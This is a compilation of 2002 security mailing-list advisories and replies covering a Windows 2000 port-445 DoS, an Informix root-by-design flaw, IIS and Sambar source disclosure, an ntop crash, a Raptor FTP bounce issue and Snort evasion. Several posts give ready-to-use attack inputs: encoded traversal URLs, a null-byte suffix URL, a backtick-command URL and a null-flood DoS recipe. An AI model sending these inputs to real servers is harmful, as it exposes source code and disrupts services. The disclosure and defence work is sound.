-=Windows 2000 microsoft-ds Denial of Service=- courtesy of KPMG Denmark BUG-ID: 2002011 Released: 17th Apr 2002 Problem: The default LANMAN registry settings on Windows 2000 could allow a malicious user, with access to TCP port 445 on your Windows 2000, to cause a Denial of Service. Vulnerable: === - Windows 2000 Server (SP0, SP1, SP2) - Windows 2000 Advanced Server (SP0, SP1, SP2) - Windows 2000 Professional (SP0, SP1, SP2) Details: Sending malformed packets to the microsoft-ds port (TCP 445) can result in kernel ressources being allocated by the LANMAN service. The consequences of such an attack could vary from the Windows 2000 host completely ignoring the attack to a blue screen. An attack could be something as simple as sending a continuous stream of 10k null chars to TCP port 445. The most common symptoms would be that the LANMAN service would allocate a lot of kernel memory, until a point, where very few applications would be able to run. The routine that draws windows would commence to draw incomplete windows, the warning beep would be replaced by an error stating that the sound driver could not be loaded. Internet Information Server would no longer be able to service .asp pages, attempts to reboot the server (as administrator) would result in the error You do not have permissions to shutdown or restart this computer., aso. It would frequently be possible to cause the system service to enter a state where it constantly used 100% CPU usage. A PC was left in this state over the weekend, to see if it would recover on it's own. It did not recover. Vendor URL: === You can visit the vendors webpage here: http://www.microsoft.com Vendor response: The vendor was contacted mid-October, 2001. The vendor released a Q-article, describing the problem and possible solutions on the 11th of April, 2002. KPMG was notified of the publication on the 17th of April, 2002. Corrective action: == The vendor has suggested two possible solutions, available here: http://support.microsoft.com/default.aspx?scid=kb;en-us;Q320751 Author: Peter Gründl ([EMAIL PROTECTED]) KPMG is not responsible for the misuse of the information we provide through our security advisories. These advisories are a service to the professional security community. In no event shall KPMG be lia- ble for any consequences whatsoever arising out of or in connection with the use or spread of this information.
IBM Informix Web DataBlade: Local root by design
IBM Informix Web DataBlade: Local root by design By Simon Lodal, Denmark Vendor status: Notified months ago, said they would be working on updates, never heard anything. Software: Web DataBlade 4.12, IDS 9.20/9.21, Linux 2.2/2.4, SunOS 5.7 (OS, IDS and WDB versions seem to be irrelevant). Impact: Any user who can: 1) Save a Perl script anywhere on the server's disk, 2) Run WebDataBlade HTML code of his own choice (calling that Perl script) ... can execute any code of choice as the database uid, which is usually root. Any WDB developer can do this. Any other local user with admin right on any database can do it by loading the WDB module into their database. Other local users will not be able to exploit this by default, but if just one WDB developer has lax permissions on his scripts, other users may modify it to assign root access to themselves. Finally, the SQL injection vulnerability (other report) allows any remote user to save Perl script and execute it from HTML code. These vulnerabilities can therefore be combined into a remote root exploit. Workaround: Disable the entire Perl script feature. I believe it must be enabled explicitly, but that may depend on how you got Web DataBlade. However, any site needing to send mail, copy/move/create/delete external files, or otherwise communicate with the world outside the database, will usually need to use this feature, as it is the easiest way to do these things (alternatives are C and Java). --- Details The Web DataBlade has an unrestricted facility for running commands of choice as the database user. The database runs as root, unless you have taken special precautions to start it as another user. Therefore you get root, by design. Or at least informix, if the administrator managed to start the database as this user. The Web DataBlade language has no builtin commands for dealing with files, network etc. Instead, Informix allows calling external scripts. Such a feature, you would think, would simply allow execution of shell commands, like system(). But Informix decided a much more complex setup using a long-running daemon written in Perl. You can not call shell commands from the HTML pages, instead pages instructs the daemon to execute a labeled piece of (Perl) code; a meta function. The Perl daemon is connected through a socket connection. The daemon is started the first time a function in it is called, and keeps running until the database itself is shutdown. This design may look nice. Some actions can be done with Perl code alone, avoiding spawning a new process and thus potentially gaining speed. Too, it limits what commands can be run; this is decided by the person who has access to change the Perl script. And it can take some complexity away from the HTML code. But now the trouble. Anyone with write access to somewhere on the server's disk can add his own Perl script. Anybody who can add WDB HTML code request his own page and thus call the script and the functions within it. Several different Perl daemons can run simultaneously, and there are no restrictions on where the scripts should be placed, who can call the actions within them, who should own them or what their permissions should be. All this would not be so bad, if the script were just run as stand-alone, one-shot shell commands, running under the uid of the calling user. But the scripts are started by the database, and keep running as the database user (again, usually root), regardless of caller's identity. Simply said, you can create a Perl script of choice and have it run as root. Unfortunately this is an utter design mistake which can not easily be fixed, at least not without breaking existing scripts. The Webdriver module usually logs into the database using one specific username/password, but it can also be configured to login on behalf of the actual user making the connection to the webserver. This would not be a problem if external commands were executed as separate processes running under the uid of the connecting user, but here we are dealing with a daemon executing commands on behalf of possibly many different uids (any uid which the webdriver can connect as). And in their infinite wisdom Informix decided that when we dont know which uid we will serve, they'll better just get the uid of the database server itself, which usually happens to be root. They simply did not even think about how to deal with the change of uids. A brief discussion I had with a developer at Informix clearly indicated complete lack of understanding of this problem. As a sidenote, Informix' own example script contains an action which is intended to allow execution of user-defined Perl code... Proof of concept: I am not going to provide the exact syntax here since that does not help the description any further. Anyone with access to a machine running WDB can fetch the example script and modify it. Try fx to write a new file, and see who gets to own it. Simon Lodal
Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure
Right, you can only access files ending in the four allowed extensions. These extensions are: .asp, .inc, .htm, and .html. -HD On Wednesday 17 April 2002 07:25 am, Randy Hinders wrote: While checking various files and extensions I wanted to ensure that other files were still protected from this. I was not able to read the global.asa but was able to read (as expected) other asp pages.. http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/% c0%ae%c0%ae/global.asa Returned View Active Server Page Source-- Access Denied to the browser. http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/% c0%ae%c0%ae/iisstart.asp Returned the source code to the browser.
RE: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure
While checking various files and extensions I wanted to ensure that other files were still protected from this. I was not able to read the global.asa but was able to read (as expected) other asp pages.. http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/global.asa Returned View Active Server Page Source-- Access Denied to the browser. http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/iisstart.asp Returned the source code to the browser. Yes, the IISSAMPLES and all other SDK items should never be installed on a production machine, but should a client upload this code to a shared hosting environment where the global.asa is properly protected with NTFS permissions they will not be able to gain access to the source code through this method. HTH Randy Hinders MCT (ret.), MCSE, MCP +I A+ NT Systems Administrator DONet, Inc www.donet.com www.adsi4nt.com ~~Hoka Hey, Lakotas~~ -Original Message- From: H D Moore [mailto:[EMAIL PROTECTED]] Sent: Tuesday, April 16, 2002 11:01 PM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure --[ Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Summary: Microsoft's IIS 5.0 web server is shipped with a set of sample files to demonstrate different features of the ASP language. One of these sample files allows a remote user to view the source of any file in the web root with the extension .asp, .inc, .htm, or .html. The IISSamples virtual directory should not be left on production servers in the first place, but until now there were no serious[1] vulnerabilities found in those sample scripts. Microsoft was _not_ contacted about this, they can read the lists like everyone else. This is an issue that can be fixed by proper system administration. snip _ Chat with friends online, try MSN Messenger: http://messenger.msn.com
Microsoft Security Bulletin MS02-019: Unchecked Buffer in Internet Explorer and Office for Mac Can Cause Code to Execute (Q321309)
-BEGIN PGP SIGNED MESSAGE- - -- Title: Unchecked Buffer in Internet Explorer and Office for Mac Can Cause Code to Execute (Q321309) Date: 16 April 2002 Software: Microsoft Internet Explorer 5.1 for Macintosh, Microsoft Outlook Express 5.0 for Macintosh, Microsoft Office v. X, for Macintosh, Microsoft Office 2001 for Macintosh, Microsoft PowerPoint 98 for Macintosh Impact: Run Code of Attacker's Choice Max Risk: Critical Bulletin: MS02-019 Microsoft encourages customers to review the Security Bulletin at: http://www.microsoft.com/technet/security/bulletin/MS02-019.asp. - - - -- Issue: == This is a cumulative patch that, when applied, eliminates all previously released security vulnerabilities affecting IE 5.1 for Macintosh, and Office v. X for Macintosh. In addition, it eliminates two newly discovered vulnerabilities. - The first is a buffer overrun vulnerability associated with the handling of a particular HTML element. Because of support for HTML in Office applications, this flaw affects both IE and Office for Macintosh. A security vulnerability results because an attacker can levy a buffer overrun attack against IE that attempts to exploit this flaw. A successful attack would have the result of causing the program to fail, or to cause code of the attacker's choice to run as if it were the user. - The second is a vulnerability that can allow local AppleScripts to be invoked by a web page. This vulnerability can allow locally stored AppleScripts to be invoked automatically without first calling the Helper application. The AppleScripts would run as if they had been launched by the user, and could take the same actions as any AppleScript legitimately launched by the user. The AppleScript would have to already be present on the system; there is no way for an attacker to deliver an AppleScript of her choosing through this vulnerability. Mitigating Factors: Unchecked Buffer in HTML Element: - Successfully exploiting this issue with Office files requires that a user accept files from an unknown or untrusted source. Users should never accept files unknown or untrusted sources. Accepting files only from trusted sources can prevent attempts to exploit this issue. - A successful attack using HTML email would require specific knowledge of the user's mail client and cannot be mounted against PC users. - A successful attack using an HTML web page would require the attacker to lure the user to visiting a site under her control. Users who exercise caution in their browsing habits can potentially protect themselves from attempts to exploit this vulnerability. - On operating systems that enforce security on per-user basis, such as Mac OS X, the specific actions that an attacker's code can take would be limited to those allowed by the privileges of the user's account. Local AppleScript Invocation: - The vulnerability only affects IE on Mac OS 8 9. - A successful attack requires that the attacker know the full path and file name of any AppleScript they want to invoke. - The vulnerability provides no means to deliver an AppleScript of the attacker's construction: it can only invoke AppleScripts already present on the user's system. Risk Rating: - Internet systems: None - Intranet systems: None - Client systems: Critical Patch Availability: === - A patch is available to fix this vulnerability. Please read the Security Bulletin at http://www.microsoft.com/technet/security/bulletin/ms02-019.asp for information on obtaining this patch. Acknowledgment: === - Josha Bronson of AngryPacket Security (http://sec.angrypacket.com/) and w00w00 (http://www.w00w00.org/). - - THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. -BEGIN PGP SIGNATURE- Version: PGP 7.1 iQEVAwUBPLxxfo0ZSRQxA/UrAQE1+Qf9FvSoqxdKNi+ItrLWFwonzQRJSBlYc71Q 2WnjCf2e4HeYf72oulucu9k3C+3FEfaduoHIUP+i/4ZHMRdkDicutwNcKxchhmzr
Re: Snort exploits
Heh, well... first... don't panic. :-) First of all I would like to commend Dug on his responsible disclosure stance. He has given the IDS vendors several months heads up that this stuff is in the pipe... I think everyone who needed to know knew this was coming down the pipe, so this is in _no_ way critical of him. I was actually expecting him to release fragroute on the CanSecWest conference CD, for his talk on it there and am preparing some appropriate counter measures for the variant of snort I was going to put on there. Been kinda swamped with conference preparations so please do not ask me for any of this in advance of the conference. Odds are now that this info has gone out snort cvs will have fixes for this in a matter of hours or days... The TCP evasions are fairly easily detectable as overlaps should not normally occur. I'm sure Marty or Andrew will be releasing some tweaks to stream4 shortly to address this. It is just a matter of slightly more rigorous alerting and an occasional little bit of extra noise. Similarly the IP fragmentation detection just needs slightly more rigorous overlap detection and alerting, as these overlaps will not be occurring in normal situations. For now as a workaround you can just alert on small fragments (resurrect minfrag... heh) which should be indicative of games being played. Note that some of these overlaps were successful in snort 1.8.x because the teardrop detection had a bug in it which was recently found and was only fixed again in snort 1.8.4. The moral of the story is that it pays to keep your copy of snort current. :-) Basically all the chaffing at the IP and TCP level is detectable as those should not be normal conditions. Look to snort cvs over the next few days for solutions to these issues... To Dug: As far as playing timing games in the future, well the solution for this and some other problems will be target based reassembly which varies reassembly timing and overlap behaviour based on destination to mimic host specifics. And though the current frag2 snort defragger features deterministic timeout behaviour the earlier defrag reassembler had non-deterministic timeout behaviours on purpose to specifically avoid timeout games and this kind of behaviour will likely be resurrected on future defraggers. I have had a defragger in the works for, oh, a long time... :) that fixes this and some other issues. Guess Marty, I, and the other snort developers have to get off our lazy asses (since snort development proceeds so slowly :-) and fix that now. Heh... I'm being sarcastic for those that didn't note. The same logic and procedures can be applied at the TCP level as well as at the IP fragmentation layer BTW. To everyone else: The game of evasion and coutermeasures is the snake eating its tail and you shouldn't be naive and assume that there aren't other evasions out there because there are _always_ other obfuscations and countermeasures, and then detectors for those. That's why you pay us snort developers the big bucks, and you should keep your ids builds current fairly often... to keep you safe from that. :-) But using fairly loaded terms like blindside is just excessively alarmist imho. cheers, --dr On Tue, 16 Apr 2002 20:07:12 -0700 [EMAIL PROTECTED] wrote: I didn't see it posted to these lists, but yesterday Dug Song quietly released a tool on the focus-ids list which totally blindsides Snort - http://www.monkey.org/~dugsong/fragroute/index.html. His README.snort file contains several fragroute scripts which blindside even the current Snort version in CVS, tested on RedHat 7.2. For example, the latest wu-ftpd exploits run through the one line tcp_seg 1 new don't trigger any Snort alerts at all. :( :( Fragroute is a very powerful new tool. Has anyone found other attacks against Snort with it, or tried it against any other IDS for that matter? -=+ 0xCafeBabe +=- Hush provide the worlds most secure, easy to use online applications - which solution is right for you? HushMail Secure Email http://www.hushmail.com/ HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/ Hush Business - security for your Business http://www.hush.com/ Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/ Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople -- --dr pgpkey: http://dragos.com/dr-dursec.asc CanSecWest/core02 - May 1-3 2002 - Vancouver B.C. - http://cansecwest.com
RE: Raptor Firewall FTP Bounce vulnerability
Firewall: Raptor 6.5.3i on Sun Solaris 7 Raptor (SEF) 7.0 on Windows NT4.0, can also be exploited. Note: Has Symantec Support been notified?
RE: Raptor Firewall FTP Bounce vulnerability
Thanks for the info. Yes, Symantec support were notified on 5 April 2002. Roy Hills At 13:35 17/04/02 +0200, Lysel Christian Emre wrote: Firewall: Raptor 6.5.3i on Sun Solaris 7 Raptor (SEF) 7.0 on Windows NT4.0, can also be exploited. Note: Has Symantec Support been notified? -- Roy HillsTel: +44 1634 721855 NTA Monitor Ltd FAX: +44 1634 721844 14 Ashford House, Beaufort Court, Medway City Estate, Email: [EMAIL PROTECTED] Rochester, Kent ME2 4FA, UK WWW: http://www.nta-monitor.com/
segfault in ntop
I'm sorry if this has already been discussed on here before, but I went through the thread and saw nothing on it. I was able to remotley segfault ntop v.2.0.0 using Netscape 6.1 by simply specifying a command in the url location bar. For example: http://ntop.site.com:port/`ls` That above command will cause ntop to segfault and core dump. I tried a few different commands, ls and su segfaulted ntop, whereas everything else I tried gave a 403 error, but ntop stayed online. Here's information about my ntop platform: Mandrake Linux v8.1 kernel 2.4.8-26mdk ntop v.2.0.0 MT [i686-pc-linux-gnu] (01/24/02 03:04:18 PM build) I was able to segfault ntop from the following platforms: Mandrake Linux v8.1 kernel 2.4.8-26mdk with Netscape v6.1 (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1) Mandrake Linux v8.1 kernel 2.4.8-26mdk with Opera 5.0 for Linux - 20010510 Build 024 -[5] Windows 2000 Server 5.00.2195 SP2 with Netscape v6.2.2 (Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.4.1) Gecko/20020314 Netscape6/6.2.2) I was unable to duplicate this segfault with the following browsers: Internet Explorer v6.0.2600. Konqueror v2.2.1 I did not test any other platforms or browsers than the ones listed here. I have notified ntop and haven't received a response yet. Thanks, jason
KPMG-2002012: Sambar Webserver Serverside Fileparse Bypass
-=Sambar Webserver Serverside Fileparse Bypass=-
courtesy of KPMG Denmark
BUG-ID: 2002012
Released: 17th Apr 2002
Problem:
A flaw in the serverside URL parsing could allow a malicious user to
bypass serverside fileparsing and display the sourcecode of scripts.
The same flaw could allow a malicious user to crash the web service.
Vulnerable:
===
- Sambar Webserver V5.1p on Windows 2000
- Other versions were not tested.
Details:
It is possible to bypass the serverside parsing of scripts, such as
.pl, .jsp, .asp, .stm and download the sourcecode. The bypassing also
opens up for a request to certain DOS-devices that the server would
then attempt to access. These ressources used in such requests are
not freed properly and as a result, the web server will eventually
run out of memory and the operating system will kill the web
service.
To bypass the serverside parsing, an attacker would have to access
the ressource with a suffix of spacenull. There are a lot of
ways to achieve this in eg. Internet Explorer, and an example of
sourcecode exposure could be:
http://server/cgi-bin/environ.pl+%00
which would return the following (perl sourcecode):
read(STDIN, $CONTENT, $ENV{'CONTENT_LENGTH'});
print GATEWAY_INTERFACE: $ENV{'GATEWAY_INTERFACE'}
PATH_INFO: $ENV{'PATH_INFO'}
PATH_TRANSLATED: $ENV{'PATH_TRANSLATED'}
QUERY_STRING: $ENV{'QUERY_STRING'}
REMOTE_ADDR: $ENV{'REMOTE_ADDR'}
REMOTE_HOST: $ENV{'REMOTE_HOST'}
REMOTE_USER: $ENV{'REMOTE_USER'}
REQUEST_METHOD: $ENV{'REQUEST_METHOD'}
DOCUMENT_NAME: $ENV{'DOCUMENT_NAME'}
DOCUMENT_URI: $ENV{'DOCUMENT_URI'}
SCRIPT_NAME: $ENV{'SCRIPT_NAME'}
SCRIPT_FILENAME: $ENV{'SCRIPT_FILENAME'}
SERVER_NAME: $ENV{'SERVER_NAME'}
SERVER_PORT: $ENV{'SERVER_PORT'}
SERVER_PROTOCOL: $ENV{'SERVER_PROTOCOL'}
SERVER_SOFTWARE: $ENV{'SERVER_SOFTWARE'}
CONTENT_LENGTH: $ENV{'CONTENT_LENGTH'}
CONTENT: $CONTENT
END
Vendor URL:
===
You can visit the vendors webpage here: http://www.sambar.com
Vendor response:
The vendor was contacted 3rd of April, 2002. The vendor confirmed the
bug on the same day, and notified us that a patch was being developed.
On the 17th of April, the vendor released a new version that corrects
the issues.
Corrective action:
==
The vendor has released Version 5.2b, which is available here:
http://sambar.dnsaloas.org/win32-preview.tar.gz
Author: Peter Gründl ([EMAIL PROTECTED])
KPMG is not responsible for the misuse of the information we provide
through our security advisories. These advisories are a service to
the professional security community. In no event shall KPMG be lia-
ble for any consequences whatsoever arising out of or in connection
with the use or spread of this information.
IBM Security Advisory: IBM Tivoli Policy Director WebSEAL
-BEGIN PGP SIGNED MESSAGE- IBM SECURITY ADVISORY Wed Apr 17 13:05:19 CDT 2002 = VULNERABILITY SUMMARY VULNERABILITY:Induced failure of IBM Tivoli Policy Director WebSEAL component PLATFORMS:All platforms running IBM Tivoli Policy Director WebSEAL, version 3.8, initial release, and using SSL smart junctions SOLUTION: Apply the FixPaks, listed in this Advisory THREAT: Malicious user can cause WebSEAL server failure CERT Advisory:NONE = DETAILED INFORMATION I. Description Background A correspondent to SecurityFocus' BUGTRAQ in December 2001 (see http://online.securityfocus.com/archive/1/245283) reported a possible denial-of-service vulnerability in IBM Tivoli Policy Director WebSEAL, v3.8. Discussion We have reviewed the purported problem and have concluded that there is no denial of service vulnerability. IBM Tivoli Policy Director v3.8, however contains a defect related to the use of SSL junctions between the WebSEAL component and Web Servers. This defect can cause the WebSEAL component to fail if SSL junctions are being used, and certain URLs are then passed across these junctions. This exposure was corrected as part of a regular fixpack cycle, in Policy Director WebSEAL 3.8 Fixpack 1. II. Impact Customers using the original (Gold Master) release of IBM Tivoli Policy WebSEAL Version 3.8, who also incorporate SSL junctions in their deployment, may be subject to WebSEAL server failures. III. Solutions Workaround There is no workaround. Official fix The solution to this security-related exposure is to apply Fixpack 1 for the IBM Tivoli Policy Director WebSEAL, v3.8. IBM recommends that customers always stay current with fixpacks for all software products. All registered customers have access to the Tivoli Patches download site, and can access the IBM Tivoli Policy Director WebSEAL 3.8 Fixpack 1 at: https://www.tivoli.com/secure/support/patches/Tivoli_SecureWay_Policy_Director_WebSEAL_.html#3.8-PWS-0001 IV. Contact Information Comments regarding the content of this announcement can be directed to: [EMAIL PROTECTED] To request the PGP public key that can be used to encrypt new AIX security vulnerabilities, send email to: [EMAIL PROTECTED] with a subject of get key. If you would like to subscribe to the AIX security newsletter, send a note to [EMAIL PROTECTED] with a subject of subscribe Security. To cancel your subscription, use a subject of unsubscribe Security. To see a list of other available subscriptions, use a subject of help. IBM and AIX are a registered trademark of International Business Machines Corporation. All other trademarks are property of their respective holders. -BEGIN PGP SIGNATURE- Version: PGP for Personal Privacy 5.0 Charset: noconv iQCVAwUBPL3CCwsPbaL1YgqvAQHZlwP/XQn1Q/GAfBaBHL2acrHLXFzWQ2tXoRvO ugkbBJkEBBrkeAiHbM7i0u8uXA7gqn+6S0QmFU6y8sQ9VfldlTh7/C/0fxFNlJ9Y Pb+njBRfala9417OUPXhBK4aUeRZxqWaFeGTPz+Jkx8CutTmHOE1vP6sioBM8ncr ulXP+XiOJ5o= =Iknk -END PGP SIGNATURE-
Re: Raptor Firewall FTP Bounce vulnerability
In-Reply-To: [EMAIL PROTECTED] Symantec Enterprise Firewall FTP Bounce Vulnerability Date Discovered April 16, 2002 Risk Medium (dependent on customer configuration) Affected Versions: Raptor Firewall V6.5.3 (Solaris) Symantec Enterprise Firewall V7.0 (Solaris) Overview Symantec is aware of an FTP Bounce Vulnerability condition reported in Bugtraq ID# 267784 (http://online.securityfocus.com/archive/1/267784). This potential vulnerability could affect some Symantec Enterprise Firewall deployments. Using this FTP-protocol based vulnerability, an attacker could potentially hide an attack by using the firewall identity against an unsuspecting and unprotected external machine. In addition, by overwriting the PORT command with its own internal address, the firewall overwrites the FTP-server built-in protection mechanism that protects against this type of attack. Recommendation If the FTP Bounce Attack affects your deployment, please make sure you apply the related hotfix available from the Symantec Enterprise Support site. This hotfix is an enhanced version of our FTPd module for the affected platforms that extends the protection currently provided by the firewall. We are currently investigating if this problem impacts our remaining supported products and platforms and we will release enhanced versions of the FTPd module as necessary. This module update is available for download from the Symantec Enterprise Support site (http://www.symantec.com/techsupp). The following enhancements have been made to the FTPd module for Solaris: 1) By default, if the firewall detects a PORT request destined for an IP address other than the IP address of the FTP client, it will log the following warning: #8220;353 Warning: PORT command referenced a destination (x.x.x.x) that doesn't match control channel (y.y.y.y): possible Bounce attack? To enforce strict PORT checking please set #8220;ftpd.allow_address_mismatch=False#8221; in the Config.cf file.#8221; If the firewall administrator decides that this is not a problem in their environment, they can disable this Warning message by setting the following Config.cf variable: ftpd.suppress_address_mismatch_warning=True (default is False) 2) If the firewall administrator wishes to enforce strict PORT command checking and block any PORT requests that reference a different address than the original FTP client IP they can set the following Config.cf variable: ftpd.allow_address_mismatch=False (default is True) By enforcing #8220;strict#8221; PORT checking on the firewall, security administrators do not have to make sure that all of their FTP servers are patched or configured to block the FTP Bounce Attack. These security enhancements were verified by Symantec and ICSA Labs (www.icsalabs.com). The new features will extend the enterprise-level protection provided by our FTP proxy which among other checks already includes protection against FTP Bounce attacks off the firewall itself, blocking PORT commands that select a well-known port, FTP strong/weak user authentication methods, GET/PUT granular security policies, FTP protocol and command verification, and transparent address hiding. Technical Description The FTP Bounce attack exploits a known design flaw in the FTP standard. All RFC compliant FTP servers must support the PORT command. The PORT command is used between an FTP client and server to coordinate the data channel connection between the two devices. The RFC dictates that a connection for the data channel should be allowed to any IP address and any port. However, this RFC- compliancy renders FTP Servers vulnerable to misuse of the PORT command. For a more detailed explanation of this issue please see CERT® Advisory CA-1997-27 FTP Bounce and the related technical tip. The Symantec Enterprise Firewall automatically rewrites the PORT command with either the address of the client machine or the firewall address. In either case when the PORT request reaches the FTP server, the PORT command will match the source address of the FTP client. If configured, the FTP server scans the packet to make sure the PORT command matches the IP address of the client, and in all cases it does. The FTP server then attempts to open a data connection to the client IP address, which then gets translated by the firewall to the victim#8217;s IP address. This is not a desired behavior since it gives the security administrator a false sense of protection from an FTP bounce attack. Copyright (c) 2002 by Symantec Corp. Permission to redistribute this Alert electronically is granted as long as it is not edited in any way unless authorized by Symantec Security Response. Reprinting the whole or part of this Alert in medium other than electronically requires
Re: An alternative method to check LKM backdoor/rootkit
Paul Starzetz [EMAIL PROTECTED] writes: Be sure that this will be fixed in the next 'generation' of LRKM's. Patching the device methods for disk special nodes is not a big deal - why not to incorporate even your code into one of the nice LRKM's? You probably found a weaknes of 'current' LRKM's but in general it is a bad idea to check your machine while running a compromised kernel. I agree. You can never be sure which kernel you are running. An attacker could have placed a modified kernel on a swap device (which excludes this very area from being used as swap space), and tweaked the boot loader to load the modified kernel. Using this approach, the modified kernel image can be made completely invisible easily, and it still survives reboot. Such a modification is very hard to spot even during an offline analysis, and the checklists I've seen so far do not address this problem at all. -- Florian Weimer[EMAIL PROTECTED] University of Stuttgart http://CERT.Uni-Stuttgart.DE/people/fw/ RUS-CERT +49-711-685-5973/fax +49-711-685-5898
RE: An alternative method to check LKM backdoor/rootkit
Wang Jian wrote : Our alternative method uses the first style: to find the differences between the fake view and the real view. [...] We read the raw disk and traverse the filesystem on disk, bypass the live filesystem, and create a real view of files on disk; then traverse the live filesystem to get the fake view. Compare the two view, we can find the differences. We will find the stealth files. For your information, I wrote the same kind of tool some time ago. It works fine for my needs, and found all the LKM I tested, as far as files are hidden (I mean, if the LKM doesn't hide any file, ancheck doesn't find it). I definitly think that the Find the differences between the two views approach is a very good approach to detect LKM. I called my tool ancheck (alternate ncheck) because it works more or less like the UNIX ncheck command (ncheck exists on most UNIX systems, but not on Linux) : http://www.cert-ist.com/francais/outils/ancheck03.tar.Z http://www.cert-ist.com/francais/outils/ancheck03.tar.Z.sig Ancheck is a set of 2 UNIX commands (ls_hidden and ancheck) designed to locate hidden or deleted files. It works on UFS (Solaris) and EXT2 (Linux) file systems. You need TCT (the Coroner's Toolkit)to compile the package. TCT can be downloaded from : http://www.porcupine.org/tct http://www.fish.com/tct/ Philippe Bourgeois Cert-IST
RE: Raptor Firewall FTP Bounce vulnerability
Hiya, As an observation, It's worth noting that by default the Raptor / SEF code disables FTP PORT connections to low ports (1024), so although it might be possible to probe a remote machine, the utility of the exercise is limited. Regards, Martin O'Neal Senior Security Consultant -Original Message- From: Roy Hills [mailto:[EMAIL PROTECTED]] Sent: 15 April 2002 15:12 To: [EMAIL PROTECTED] Subject: Raptor Firewall FTP Bounce vulnerability
Re: Remote buffer overflow in Webalizer
Here is a patch to fix the vulnerability (tested against webalizer-2.01-06). Bad fix.. while it will prevent the buffer from overflowing (which I still fail to see how can be used to execute a 'root' exploit, even with a LOT of imagination), but will cause the buffer to be filled with a non-null terminated string which will do all sorts of nasty things to your output, not to mention wreak havoc on the stats since you are cutting off the domain portion, not the hostname part, and adding random garbage at the end. Anyway, Version 2.01-10 has been released, which fixes this and a few other buglets that have been discovered in the last month or so. Get it at the usual place (web: www.mrunix.net/webalizer/ or www.webalizer.org or ftp: ftp.mrunix.net/pub/webalizer/), and should be on the mirror sites soon. -- Bradford L. Barrett [EMAIL PROTECTED] A free electron in a sea of neutrons DoD#1750 KD4NAW The only thing Micro$oft has done for society, is make people believe that computers are inherently unreliable.
RE: Snort exploits
Not to get even further off topic...but I will...to support Draqos. The whole IDS evasion thing mimics the scanners vs. virus writers war. I've been doing antivirus work since 1989 and I have heard that virus writers were going to polymorph, encrypt, oli-this, poly-that since before there were 100 viruses. Nobody, not even the AV vendors thought that scanners would still be fighting the good fight (and winning 99.999% of the time) when 30,000+ viruses and worms appeared. Virus scanners would run out of memory, wouldn't be able to keep up with the signatures, would end up with too many false-positives, would run so slow nobody would use them, etc. But the truth is fingerprint scanning (no matter how flawed) still works and I hear less about AV scanner deaths every year...and when I do hear it's from the vendors themselves...and guess what they have the new solution sitting in the wings ready to go. I see the same pattern in IDS...heck, yeah, the black hatters will develop more sophisticated hacks...and the white hatters will fight back...SUCCESSFULLY. With that said, there are some viruses today that scare the mess out of the good AV guys...ones that scare them and keep them up at night. And DDoS Reflection attacks???...if you're not scared you don't understand the problem. But the good guys will respond and life will go on as usual. Just my one cent. Roger A. Grimes *** *Roger A. Grimes, VP of IT for GK/PHR Holding Company *Gold Key Resorts and Professional Hospitality Resources *email: [EMAIL PROTECTED] *ph: 757-491-2101 x403 *fax:757-491-6550 *932 Laskin Road, Virginia Beach, VA 23451 *Author of Malicious Mobile Code: Virus Protection for Windows by O'Reilly *http://www.oreilly.com/catalog/malmobcode/ *** ;-Original Message- ;From: Dragos Ruiu [mailto:[EMAIL PROTECTED]] ;Sent: Wednesday, April 17, 2002 12:08 AM ;To: [EMAIL PROTECTED] ;Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]; ;[EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] ;Subject: Re: Snort exploits ;Heh, well... first... don't panic. :-) ;I was actually expecting him to release fragroute on the CanSecWest conference CD, ;for his talk on it there and am preparing some appropriate counter measures for the ;variant of snort I was going to put on there. Been kinda swamped with conference ;preparations so please do not ask me for any of this in advance of the conference. ;Odds are now that this info has gone out snort cvs will have fixes for this ;in a matter of hours or days... ;The TCP evasions are fairly easily detectable as overlaps should not normally occur. ;I'm sure Marty or Andrew will be releasing some tweaks to stream4 shortly to ;address this. It is just a matter of slightly more rigorous alerting and ;To everyone else: ;The game of evasion and coutermeasures is the snake eating its tail and you ;shouldn't be naive and assume that there aren't other evasions out there because ;there are _always_ other obfuscations and countermeasures, and then detectors for ;--dr
